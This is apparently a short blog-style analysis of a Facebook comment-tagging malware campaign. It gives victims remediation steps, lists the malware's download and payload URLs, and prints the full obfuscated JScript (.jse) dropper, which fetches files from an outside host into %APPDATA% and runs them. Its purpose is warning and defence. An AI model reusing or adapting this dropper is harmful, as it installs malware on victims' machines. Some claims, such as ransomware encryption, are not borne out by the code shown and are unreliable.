Facebook comment tagging virus
How to protect yourself from it and how to react if you are affected or if you are spreading it.
This short research analyzes the infamous Facebook comment tagging virus. Attached is the code and how and who it may infect.
General info
You may receive a Facebook notification in the app and/or in your email regarding a friend tagging you in a comment on Facebook. Once you click it, you download a ransomware virus to your device.
It’s happened to me. Am I infected?
If you are on a Windows machine and the file was run — you are infected, turn off that computer immediately!
If the file hadn’t been run and is just sitting in that downloads folder, delete it and clear the recycle bin.
How can I fix this?
There are labs that know how to handle viruses. Take you computer to one of them.
Essentially, there are processes on your computer that are downloading files and running installations in the background on your behalf in order to encrypt your data and ask for ransom.
My friends say I’m spreading the virus — what can I do?
Inform your Facebook friends about the problem on your feed. Share this article with them.
Remove Chrome extensions with funny names
chrome://extensions/
Disable any Facebook app logins from unknown and/or unused apps
https://www.facebook.com/settings?tab=applications
Remove all of your devices except the one you are using to do this from Facebook
https://www.facebook.com/settings?tab=security§ion=devices&view
End all of your open Facebook sessions by pressing “End all activity”
https://www.facebook.com/settings?tab=security§ion=sessions&view
Refrain from accessing Facebook on any device untli this matter is fully resolved. Consult a professional about the issue. If you find out any useful information about the issues that hasn’t been published, go ahead and publish it.
Remove Google Chrome from your machine. Download a new browser, such as Opera or Firefox, and login to Facebook from there. If you smartphone is Android, you can remove the Facebook app and use Opera there as well.
The spreading virus definitely has control over your Facebook account. It can be running from any of your devices — smartphones, PCs, browsers, etc’. It could even be running from an app connected to Facebook on your behalf.
My research indicates that there is a high probability that it is running from a Chrome extension on one or more of your computers.
Background information
Where is the virus downloaded from ?
It seems to be downloaded from Google Drive!!!
This is the download URL — Don’t open it :)
https://doc-08-98-docs.googleusercontent.com/docs/securesc/ltg2tcekblb79spmamolu2g3b11sv1dc/jjteoiv1acn1r489ngh32g1fgi5m3bos/1466942400000/18013334076200083322/16418062723037494078/0Bwp3WS-IJOtiWlh3QnFoMWZyamM?e=download
What is a jse file and how do I open a jse file?
First of all, the file saved to your computer is with a .jse extension. This means it is a script intended for Windows operating systems running JScript only.
JSE is a script written in JScript, a programming language used for Windows and Microsoft Internet Explorer scripting. It contains source code in a format similar to JavaScript, but the JScript specification is maintained by Microsoft.
Looking for how to open jse files? Checkout http://www.openthefile.net/extension/jse
I would technicall title it: WScript host ransomware virus spreading through facebook comments
How does the virus affect your computer?
If you are on a Windows machine and you run this virus, it will automatically start downloading more files and install a Chrome extension on your machine that keeps spreading it. On top of it, it will start encrypting files on your hard drive in order to make you pay ransom to hackers.
FIles downloaded by the virus
http://userexperiencestatics.net/ext/Autoit.jpg
http://userexperiencestatics.net/ext/bg.jpg
http://userexperiencestatics.net/ext/ekl.jpg
http://userexperiencestatics.net/ext/ff.jpg
http://userexperiencestatics.net/ext/force.jpg
http://userexperiencestatics.net/ext/sabit.jpg
http://userexperiencestatics.net/ext/manifest.jpg
http://userexperiencestatics.net/ext/run.jpg
http://userexperiencestatics.net/ext/up.jpg
http://whos.amung.us/pingjs/?k=pingjse346
http://whos.amung.us/pingjs/?k=pingjse3462
The .jpg files seem to be text scripts for a windows scripting engine called autoit
The last two urls are simply pings that provide your IP address to the attackers
How does the virus spread?
This virus spreads via Facebook comments on which your friends are tagged. It is probably done by another exploit that runs on smartphones and computers.
The JSE file is hosted on Google Drive!!!
The original spreading virus is hence using Facebook and Google in order to spread itself
References
Discussion on stackexchange about this virus
Downloaded JSE file Code
var _0xe519 = [“\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70”, “\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65”, “\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65”, “\x73\x74\x61\x74\x75\x73”, “\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D”, “\x6F\x70\x65\x6E”, “\x74\x79\x70\x65”, “\x77\x72\x69\x74\x65”, “\x70\x6F\x73\x69\x74\x69\x6F\x6E”, “\x72\x65\x61\x64”, “\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65”, “\x63\x6C\x6F\x73\x65”, “\x47\x45\x54”, “\x73\x65\x6E\x64”, “\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74”, “\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C”, “\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E”, “\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C”, “\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73”, “\x4D\x6F\x7A\x69\x6C\x61”, “\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67”, “\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67”, “\x5C\x62\x67\x2E\x6A\x73”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67”, “\x5C\x65\x6B\x6C\x2E\x61\x75\x33”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67”, “\x5C\x66\x66\x2E\x7A\x69\x70”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67”, “\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67”, “\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67”, “\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67”, “\x5C\x72\x75\x6E\x2E\x62\x61\x74”, “\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67”, “\x5C\x75\x70\x2E\x61\x75\x33”, “\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36”, “\x5C\x70\x69\x6E\x67\x2E\x6A\x73”, “\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32”, “\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73”, “”];
(function(_0xc4a4x1) {
function _0xc4a4x2(_0xc4a4x2, _0xc4a4x3, _0xc4a4x4) {
if (!_0xc4a4x3 || !_0xc4a4x2) {
return null
};
var _0xc4a4x5 = WScript.CreateObject(_0xe519[0]);
_0xc4a4x5[_0xe519[1]] = function() {
if (_0xc4a4x5[_0xe519[2]] === 4 && _0xc4a4x5[_0xe519[3]] === 200) {
xa = new ActiveXObject(_0xe519[4]);
xa[_0xe519[5]]();
xa[_0xe519[6]] = 1;
xa[_0xe519[7]](_0xc4a4x5.ResponseBody);
xa[_0xe519[8]] = _0xc4a4x4;
stm2 = new ActiveXObject(_0xe519[4]);
stm2[_0xe519[6]] = 1;
stm2[_0xe519[5]]();
stm2[_0xe519[7]](xa[_0xe519[9]]());
stm2[_0xe519[10]](_0xc4a4x3, 2);
stm2[_0xe519[11]]();
xa[_0xe519[11]]()
}
};
_0xc4a4x5[_0xe519[5]](_0xe519[12], _0xc4a4x2, false);
_0xc4a4x5[_0xe519[13]](null)
}
function _0xc4a4x6(_0xc4a4x7, _0xc4a4x8) {
{
xa = new ActiveXObject(_0xe519[4]);
xa[_0xe519[5]]();
xa[_0xe519[6]] = 1;
xa.LoadFromFile(_0xc4a4x7);
ix = new ActiveXObject(_0xe519[4]);
ix[_0xe519[5]]();
ix[_0xe519[6]] = 1;
ix.LoadFromFile(_0xc4a4x8);
stm2 = new ActiveXObject(_0xe519[4]);
stm2[_0xe519[6]] = 1;
stm2[_0xe519[5]]();
stm2[_0xe519[7]](ix[_0xe519[9]]());
stm2[_0xe519[7]](xa[_0xe519[9]]());
xa[_0xe519[11]]();
ix[_0xe519[11]]();
stm2[_0xe519[10]](_0xc4a4x7, 2);
stm2[_0xe519[11]]()
}
}
fso = new ActiveXObject(_0xe519[14]);
var _0xc4a4x9 = new ActiveXObject(_0xe519[15]);
_0xc4a4x1 = new ActiveXObject(_0xe519[16]);
FileDestr = _0xc4a4x9[_0xe519[18]](_0xe519[17]);
mozklasor = FileDestr + _0xe519[19];
if (!fso.FolderExists(mozklasor)) {
fso.CreateFolder(mozklasor)
};
_0xc4a4x1.ShellExecute(_0xe519[20]);
_0xc4a4x2(_0xe519[21], mozklasor + _0xe519[22], 0);
_0xc4a4x2(_0xe519[23], mozklasor + _0xe519[24], 0);
_0xc4a4x2(_0xe519[25], mozklasor + _0xe519[26], 0);
_0xc4a4x2(_0xe519[27], mozklasor + _0xe519[28], 0);
_0xc4a4x2(_0xe519[29], mozklasor + _0xe519[30], 0);
_0xc4a4x2(_0xe519[31], mozklasor + _0xe519[32], 0);
_0xc4a4x2(_0xe519[33], mozklasor + _0xe519[34], 0);
_0xc4a4x2(_0xe519[35], mozklasor + _0xe519[36], 0);
_0xc4a4x2(_0xe519[37], mozklasor + _0xe519[38], 0);
_0xc4a4x2(_0xe519[39], mozklasor + _0xe519[40], 0);
_0xc4a4x2(_0xe519[41], mozklasor + _0xe519[42], 0);
_0xc4a4x1.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0)
})(this)
